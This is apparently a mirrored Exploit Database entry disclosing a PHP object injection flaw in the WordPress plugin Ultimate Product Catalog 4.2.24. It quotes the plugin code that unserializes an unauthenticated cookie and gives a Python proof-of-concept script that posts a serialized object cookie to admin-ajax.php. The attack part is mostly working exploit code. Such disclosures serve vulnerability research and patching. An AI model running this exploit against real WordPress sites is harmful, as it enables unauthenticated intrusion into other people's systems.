WordPress Plugin Ultimate Product Catalog 4.2.24 – PHP Object Injection

• Exploit Database
• 14 阅读

• 作者： tomplixsee
  日期： 2017-10-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43065/

• # Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
  # Google Dork: [NA]
  # Date: [Okt 30 2017]
  # Exploit Author: [tomplixsee]
  # Author blog : [cupuzone.wordpress.com]
  # Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
  # Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
  # Version: [<= 4.2.24] 
  # Tested on: [Ubuntu Server 16.04]
  # CVE : [NA]
  
  tested on app version 4.2.23, 4.2.24
  
  we can send an evil cookie (login not required) to vulnerable function
  1. vulnerable code on Functions/Process_Ajax.php <= tested
  
   203 // Adds an item to the plugin's cart
   204 function UPCP_Add_To_Cart() {
   205 global $woocommerce;
   206 global $wpdb;
   207 global $items_table_name;
   208
   209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
   210
   211 if ($WooCommerce_Checkout == "Yes") {
   212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
   213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
   214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
   215 }
   216
   217 if (isset($_COOKIE['upcp_cart_products'])) {
   218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
   219 }
   220 else {
   221 $Products_Array = array();
   222 }
   223
   224 $Products_Array[] = $_POST['prod_ID'];
   225 $Products_Array = array_unique($Products_Array);
   226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
   227 }
   228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
   229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
  
  2. vulnerable code on Functions/Shortcodes.php <= not tested
  
  POC
  1. use a WP plugin to test php object injection, 
  like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
  
  2. make a request 
  #-----------------------------------
  #! /usr/bin/python
  import requests
  url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
  data = {'action':'upcp_add_to_cart'}
  headers = {
  'Content-type': 'application/x-www-form-urlencoded',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
  }
  r = requests.post(url, data=data, headers=headers)
  
  print r.content
  
  #------------------------------------